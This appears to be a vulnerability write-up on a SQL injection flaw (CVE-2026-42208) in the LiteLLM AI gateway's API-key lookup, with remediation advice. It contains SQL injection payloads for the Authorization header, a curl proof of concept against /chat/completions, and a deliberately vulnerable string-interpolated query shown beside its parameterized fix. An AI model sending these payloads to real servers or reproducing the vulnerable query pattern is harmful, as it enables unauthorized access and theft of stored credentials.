LiteLLM has become a popular open-source “AI Gateway” (GitHub: BerriAI/litellm), making it easier to run OpenAI-style LLM queries across models and providers. But from versions 1.81.16 up to just before 1.83.7, a serious vulnerability, now identified as CVE-2026-42208, put all users at risk.

In this long read, we’ll explain the issue in plain language, show how attackers can exploit it, provide code snippets, and discuss patching strategies.

The Bug Explained

When LiteLLM checks a provided “API key” (used to gate access to the LLM proxy), it looks things up in its configured database.

But from version 1.81.16 until 1.83.7, the proxy constructed its query text by mixing in the Authorization value directly, rather than using parameter placeholders.

This unsafe pattern looks like

# Vulnerable code pattern (before v1.83.7):
cursor.execute(f"SELECT * FROM api_keys WHERE key = '{api_key}'")

If api_key is user-supplied (which it is), and LiteLLM doesn’t do proper sanitizing, an attacker can inject SQL payloads.

This opens classic SQL Injection for any LiteLLM deployment using a SQL database (Postgres, SQLite, etc).

How the Exploit Works

The API endpoints in LiteLLM take an Authorization header, which is supposed to be the API key.

If an attacker crafts a special value, error-handling code in LiteLLM’s proxy will pass this dangerous string directly into the SQL engine while trying to check the key.

Key attack facts

- Any LLM API endpoint (e.g., POST /chat/completions) can be targeted.

Suppose an attacker sends

Authorization: abc' OR 1=1; --

This turns the query into

SELECT * FROM api_keys WHERE key = 'abc' OR 1=1; --'

If the attacker guesses the database has a table named users

Authorization: ' UNION SELECT * FROM users; --

This could dump user records, emails, even credentials managed by the proxy.

Here’s a very basic PoC using curl

curl -X POST \
  -H "Content-Type: application/json" \
  -H "Authorization: ' OR 1=1; --" \
  http://<litellm-server>/chat/completions \
  -d '{"model":"gpt-3.5-turbo","messages":[{"role":"user","content":"hello"}]}'

Instead of rejecting access, the server might respond as if you have valid credentials — or leak information in error messages or in the raw SQL responses, depending on deployment.

The dangerous code path can be summarized as

1. API receives request with Authorization header.
2. LiteLLM forms SQL using the provided key (interpolated in query string).
3. On database error, error details might get returned in API response.
4. Attacker manipulates Authorization header to control SQL execution.

Code Before Patch

# Buggy: interpolates user input directly
api_key = get_authorization_header(request)
cursor.execute(f"SELECT * FROM api_keys WHERE key = '{api_key}'")

Code After Patch

# Fixed: uses parameterization, which blocks SQL injection
cursor.execute("SELECT * FROM api_keys WHERE key = ?", (api_key,))

Parameter binding is the correct way to prevent SQL injection in all modern database drivers.

Patch and Remediation

This issue is fully patched in LiteLLM v1.83.7.
The patched version always uses parameterized SQL queries for checking API keys (and elsewhere).

Do not use LiteLLM 1.81.16 – 1.83.6 in production without patching!

- Upgrade to at least LiteLLM v1.83.7 (release notes)
- Assume your data might be breached — rotate any secrets (API keys, credentials) stored in your proxy’s database.

References

- Official LiteLLM GitHub
- Security release patch 1.83.7
- CVE-2026-42208 at cve.org *(pending)*

Summary

CVE-2026-42208 was a “classic” but devastating SQL injection flaw in a next-gen AI gateway. Unauthenticated attackers could read or modify database content, steal secrets, or impersonate users simply by sending crafted Authorization headers.

If you deploy LiteLLM, upgrade immediately.
Never interpolate user input into SQL — always use parameterized queries!

> Stay secure, stay up to date.
> Discovered a similar bug? [Report it to security@github.com](mailto:security@github.com)!


*This analysis is based exclusively on review of commit logs, documentation, and the CVE advisory. All PoCs are for educational use only. Protect your AI gateways!*

Timeline

Published on: 05/08/2026 03:38:14 UTC
Last modified on: 05/08/2026 04:16:19 UTC